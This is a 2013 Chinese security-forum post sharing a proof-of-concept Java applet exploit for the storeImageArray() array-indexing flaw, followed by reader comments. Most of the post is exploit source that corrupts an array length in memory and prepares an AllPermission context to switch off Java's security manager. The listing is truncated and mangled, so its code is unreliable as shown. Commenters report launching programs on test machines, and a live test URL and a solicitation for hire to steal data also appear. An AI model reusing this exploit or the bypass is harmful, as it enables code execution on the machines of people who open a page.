Java storeImageArray 漏洞


Java storeImageArray 漏洞

园长 (你在身边就是缘,缘分写在数据库里面。) | 2013-08-21 12:43

碰巧看到我就截个图,有点忙晚点看.

下载:PSA-2013-0811-1-exploit.tgz

Java storeImageArray() Invalid Array Indexing Vulnerability (Packet Storm advisory PSA-2013-0811-1; the same PoC was later published as Exploit-DB 27705, see the thread below). How it works, as far as the listing shows: the PoC allocates a 16-byte DataBufferByte, an int[] and an Object[] back-to-back, then wraps the byte buffer in a MultiPixelPackedSampleModel whose dataBitOffset deliberately points past the buffer onto the int[]'s length field; a ComponentColorModel whose isCompatibleRaster() always returns true lets BufferedImage accept that malformed raster, and AffineTransformOp.filter() hands it to the native storeImageArray() in awt_ImagingLib.c, which does not bounds-check the offset against the buffer and writes the source pixel (0xFFFFFFFF) over a.length. Reader beware: the site's HTML stripping mangled the listing — backslashes are gone (every "n" at the end of a string literal was "\n", the JDK path is jdk/src/share/native/sun/awt/medialib/awt_ImagingLib.c), the '<' in the for-loops of errToStr() and tryExpl() was eaten, and the listing is cut off inside tryExpl(), so what follows the a.length check (the AccessControlContext swap that disables the security manager) is not shown here.

import java.awt.image.*;
import java.awt.color.*;
import java.beans.Statement;
import java.security.*;

public class MyJApplet extends javax.swing.JApplet {

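    /**
     * Applet entry point: installs the Nimbus look and feel when it is
     * available, builds the form on the event-dispatch thread and writes the
     * JRE / JVM / plug-in / OS versions to the log area so the tester can see
     * which runtime the PoC is being run against.
     *
     * Nothing exploit-related runs here; the attempt is presumably wired to
     * the "Run calculator" button handler ({@code btnStartMousePressed}),
     * which is defined elsewhere in the class.
     */
    @Override
    public void init() {
        installNimbusLookAndFeel();

        /* Build the UI on the EDT and block until it exists, so the log area
           is usable as soon as init() returns. */
        try {
            java.awt.EventQueue.invokeAndWait(new Runnable() {
                public void run() {
                    initComponents();
                    logAdd(describeRuntime());
                }
            });
        } catch (Exception ex) {
            // init() has no caller to report to; the trace lands in the Java console.
            ex.printStackTrace();
        }
    }

    /**
     * Switches to Nimbus if the JRE ships it (Java SE 6+); on older runtimes
     * or if installation fails, the default look and feel stays in place and
     * the failure is only logged.
     */
    private void installNimbusLookAndFeel() {
        try {
            for (javax.swing.UIManager.LookAndFeelInfo info : javax.swing.UIManager.getInstalledLookAndFeels()) {
                if ("Nimbus".equals(info.getName())) {
                    javax.swing.UIManager.setLookAndFeel(info.getClassName());
                    break;
                }
            }
        } catch (ClassNotFoundException ex) {
            logLookAndFeelFailure(ex);
        } catch (InstantiationException ex) {
            logLookAndFeelFailure(ex);
        } catch (IllegalAccessException ex) {
            logLookAndFeelFailure(ex);
        } catch (javax.swing.UnsupportedLookAndFeelException ex) {
            logLookAndFeelFailure(ex);
        }
    }

    /** Single place for the (identical) handling of the four L&F exceptions. */
    private static void logLookAndFeelFailure(Exception ex) {
        java.util.logging.Logger.getLogger(MyJApplet.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);
    }

    /**
     * Builds the environment dump: one line each for JRE vendor/version,
     * JVM vendor/version, Java plug-in version and OS name/arch/version.
     *
     * The separators are real newline escapes; the published listing shows a
     * bare "n" where each "\n" used to be because the HTML stripping dropped
     * the backslashes.
     */
    private static String describeRuntime() {
        return "JRE: " + System.getProperty("java.vendor") + " " + System.getProperty("java.version")
             + "\nJVM: " + System.getProperty("java.vm.vendor") + " " + System.getProperty("java.vm.version")
             + "\nJava Plug-in: " + System.getProperty("javaplugin.version")
             + "\nOS: " + System.getProperty("os.name") + " " + System.getProperty("os.arch") + " (" + System.getProperty("os.version") + ")";
    }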

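    /**
     * Appends {@code str} followed by a newline to the on-screen log area.
     *
     * The whole text is re-read and rewritten on every call, so the cost grows
     * with the log size; that is fine for the handful of lines this PoC emits.
     * Swing components are not thread-safe, so callers should be on the EDT.
     */
    public void logAdd(String str)
    {
        // "\n" restored: the published listing shows a bare "n" where the
        // HTML-stripped backslash used to be.
        txtArea.setText(txtArea.getText() + str + "\n");
    }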

  /**
   * Logs an object's {@code toString()} (or the literal "null") with an
   * optional prefix.
   *
   * @param o   value to log; a null reference is printed as "null"
   * @param str optional varargs; only the first element, if any, is used as
   *            the prefix, the rest are ignored
   */
  public void logAdd(Object o, String... str)
  {
      String prefix = "";
      if (str.length > 0) {
          prefix = str[0];
      }
      String value = (o == null) ? "null" : o.toString();
      logAdd(prefix + value);
  }

  public String errToStr(Throwable t)
  {
    String str = "Error: " + t.toString();
    StackTraceElement[] ste = t.getStackTrace();
    for(int i=0; i //GEN-BEGIN:initComponents
     /**
      * NetBeans-generated form code (GEN-BEGIN/GEN-END markers): a
      * "Run calculator" button whose mouse-press is routed to
      * {@code btnStartMousePressed} (defined elsewhere in the class) below a
      * read-only JTextArea that {@code logAdd} uses as the log. The fields
      * btnStart, jScrollPane2 and txtArea are declared elsewhere in the class.
      */
     private void initComponents() {

        btnStart = new javax.swing.JButton();
        jScrollPane2 = new javax.swing.JScrollPane();
        txtArea = new javax.swing.JTextArea();

        btnStart.setText("Run calculator");
        // mousePressed rather than an ActionListener; the handler itself is not in this listing
        btnStart.addMouseListener(new java.awt.event.MouseAdapter() {
            public void mousePressed(java.awt.event.MouseEvent evt) {
                btnStartMousePressed(evt);
            }
        });

        // Log pane: read-only, monospaced-ish Arial 12, 4-space tabs
        txtArea.setEditable(false);
        txtArea.setColumns(20);
        txtArea.setFont(new java.awt.Font("Arial", 0, 12)); // NOI18N
        txtArea.setRows(5);
        txtArea.setTabSize(4);
        jScrollPane2.setViewportView(txtArea);

        // GroupLayout: scroll pane fills the width (580 preferred), button centred below it
        javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane());
         getContentPane().setLayout(layout);
        layout.setHorizontalGroup(
            layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
             .addGroup(layout.createSequentialGroup()
                .addContainerGap()
                .addComponent(jScrollPane2, javax.swing.GroupLayout.DEFAULT_SIZE, 580, Short.MAX_VALUE)
                 .addContainerGap())
            .addGroup(layout.createSequentialGroup()
                .addGap(242, 242, 242)
                .addComponent(btnStart, javax.swing.GroupLayout.PREFERRED_SIZE, 124, javax.swing.GroupLayout.PREFERRED_SIZE)
                 .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE))
         );
        layout.setVerticalGroup(
            layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
             .addGroup(javax.swing.GroupLayout.Alignment.TRAILING, layout.createSequentialGroup()
                 .addContainerGap()
                .addComponent(jScrollPane2, javax.swing.GroupLayout.DEFAULT_SIZE, 344, Short.MAX_VALUE)
                 .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED)
                 .addComponent(btnStart)
                .addContainerGap())
        );
    }// </editor-fold>//GEN-END:initComponents

    // Platform flags, evaluated once at construction. _is64 feeds the
    // MultiPixelPackedSampleModel data-bit offset in tryExpl() (44 bytes, +8 on a
    // 64-bit JVM — presumably for the wider object header/references; confirm
    // against the target JVM's layout). _isMac is not referenced in the visible
    // part of the class.
    private boolean _isMac = System.getProperty("os.name","").contains("Mac");
    private boolean _is64  = System.getProperty("os.arch","").contains("64");

    /**
     * sRGB-backed {@link ICC_ColorSpace} that reports a single component.
     *
     * The PoC needs a color space whose {@code getNumComponents()} returns 1
     * even though the underlying sRGB profile has 3; {@code MyColorModel}
     * below is built on it with three 8-bit bands, producing the mismatched
     * destination image the exploit relies on.
     */
    class MyColorSpace extends ICC_ColorSpace
    {
        public MyColorSpace()
        {
            super(ICC_Profile.getInstance(ColorSpace.CS_sRGB));
        }

        /** Always 1, regardless of what the profile says. */
        @Override
        public int getNumComponents()
        {
            return 1;
        }
    }

    /**
     * {@link ComponentColorModel} over {@link MyColorSpace} whose raster
     * compatibility check is a no-op.
     *
     * Three 8-bit bands are declared although the color space claims one
     * component, and {@code isCompatibleRaster} unconditionally answers
     * true, so {@code BufferedImage} accepts the deliberately malformed
     * destination raster the PoC builds instead of rejecting it.
     */
    class MyColorModel extends ComponentColorModel
    {
        public MyColorModel()
        {
            // no alpha, not premultiplied, transparency 1 (== Transparency.OPAQUE), byte samples
            super(new MyColorSpace(), new int[]{8,8,8}, false, false, 1, DataBuffer.TYPE_BYTE);
        }

        /** Accepts any raster; the call is logged so the tester can see it was consulted. */
        @Override
        public boolean isCompatibleRaster(Raster r)
        {
            final boolean compatible = true;
            logAdd("MyColorModel.isCompatibleRaster() = " + compatible);
            return compatible;
        }
    }

    private int tryExpl()
    {
    try {
            // alloc aux vars
            String name = "setSecurityManager";
            Object[] o1 = new Object[1];
            Object o2 = new Statement(System.class, name, o1); // make a dummy call for init

            // allocate byte buffer for destination Raster.
            DataBufferByte dst = new DataBufferByte(16);

            // allocate the target array right after dst
            int[] a = new int[8];
            // allocate an object array right after a[]
            Object[] oo = new Object[7];

            // create Statement with the restricted AccessControlContext
            oo[2] = new Statement(System.class, name, o1);

            // create powerful AccessControlContext
            Permissions ps = new Permissions();
            ps.add(new AllPermission());
            oo[3] = new AccessControlContext(
                new ProtectionDomain[]{
                    new ProtectionDomain(
                        new CodeSource(
                            new java.net.URL("file:///"),
                            new java.security.cert.Certificate[0]
                        ),
                        ps
                    )
                }
            );

            // store System.class pointer in oo[]
            oo[4] = ((Statement)oo[2]).getTarget();

            // save old a.length
            int oldLen = a.length;
            logAdd("a.length = 0x" + toHex(oldLen));

            // create regular source image
            BufferedImage bi1 = new BufferedImage(4,1, BufferedImage.TYPE_INT_ARGB);
             logAdd(bi1);

            // prepare the sample model with "dataBitOffset" pointing outside dst[] onto a.length
             MultiPixelPackedSampleModel sm = new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE, 4,1,1,4, 44 + (_is64 ? 8:0));
             // create malformed destination image based on dst[] data
            WritableRaster wr = Raster.createWritableRaster(sm, dst, null);
             BufferedImage bi2 = new BufferedImage(new MyColorModel(), wr, false, null);
             logAdd(bi2);

            // prepare first pixel which will overwrite a.length
            bi1.getRaster().setPixel(0,0, new int[]{-1,-1,-1,-1});

            // call the vulnerable storeImageArray() function (see ...jdksrcsharenativesunawtmedialibawt_ImagingLib.c)
             AffineTransformOp op = new AffineTransformOp(new java.awt.geom.AffineTransform(1,0,0,1,0,0), null);
             op.filter(bi1, bi2);

            // check results: a.length should be overwritten by 0xFFFFFFFF
            int len = a.length;
            logAdd("a.length = 0x" + toHex(len));
            if (len == oldLen) {
                // check a[] content corruption // for RnD
                for(int i=0; i 

[原文地址]

相关讨论:

1#

xiaoL | 2013-08-21 12:47

CVE-2013-2471??

2#

ppt (|hacking for |)|?(| nuf) | 2013-08-21 12:50

java就是一个bug

3#

小黑要低调 | 2013-08-21 14:01

mark

4#

国士无双 | 2013-08-21 14:12

这是要火的节奏...

5#

_Evil (年轻人切忌浮躁,性趣是最好的导师.) | 2013-08-21 14:20

强哥强哥我爱你,就像老鼠爱大米!

6#

z7y (我是z7y,我为小胖子代言!!) | 2013-08-21 14:38

园长弟弟V5 :P

7#

sinck | 2013-08-21 14:59

mark

8#

我真的不帅 | 2013-08-21 15:00

前排小板凳,瓜子,矿泉水,十五折批发。。。

9#

点点 (http://t.qq.com/ox_diandi) | 2013-08-21 15:27

哇 要火了

10#

邪恶魔法师 (骚货) | 2013-08-21 15:37

的确牛癖

11#

Nebula | 2013-08-21 15:37

你会发现,在win7的64位IE10浏览器中PoC是有问题的(32位正常)!那是什么原因了?

12#

园长 (你在身边就是缘,缘分写在数据库里面。) | 2013-08-21 16:40

@z7y 我改了下打开页面输出z7y&vip成功了。

13#

VIP (Fatal error: Call to undefined function getwb() in /data1/www/htdocs/106/wzone/1/index.php on line 10|@齐迹@小胖子@z7y@nauscript|昨晚做梦梦见了一个ecshop注射0day,醒来后忘记在哪了。|预留广告位) | 2013-08-21 16:59

好牛逼,弹出cmd成功了

14#

园长 (你在身边就是缘,缘分写在数据库里面。) | 2013-08-21 17:01

测试地址:http://www.lolbar.net/plus/img/face/calc.htm

弹个mstsc:

15#

我是小号 (我是小学生) | 2013-08-21 18:49

@xiaoL 嗯是的

http://www.exploit-db.com/exploits/27705/

16#

我是小号 (我是小学生) | 2013-08-21 18:49

强哥强哥我爱你,就像老鼠爱大米!

17#

乌帽子 (儿啊,到大城市切莫乱搞女人啊,染上什么病回来传染给) | 2013-08-21 21:37

@园长 肿么回事啊 提示我要安装抓哇他妈才给显示

18#

园长 (你在身边就是缘,缘分写在数据库里面。) | 2013-08-21 21:39

@乌帽子 这个就是利用Java的applet漏洞在你本机执行恶意代码,亲不是getshell。

19#

Ocean | 2013-08-22 00:46

@园长 测试win8.1不成功

留言评论(旧系统):

年薪百万寻黑客 @ 2013-08-23 11:48:57

我QQ5248174 求大神入侵欧美网站拿数据 有兴趣可以加我QQ,年薪百万寻黑客!

本站回复:

[暂无回复]

文章来源于lcx.cc:Java storeImageArray 漏洞
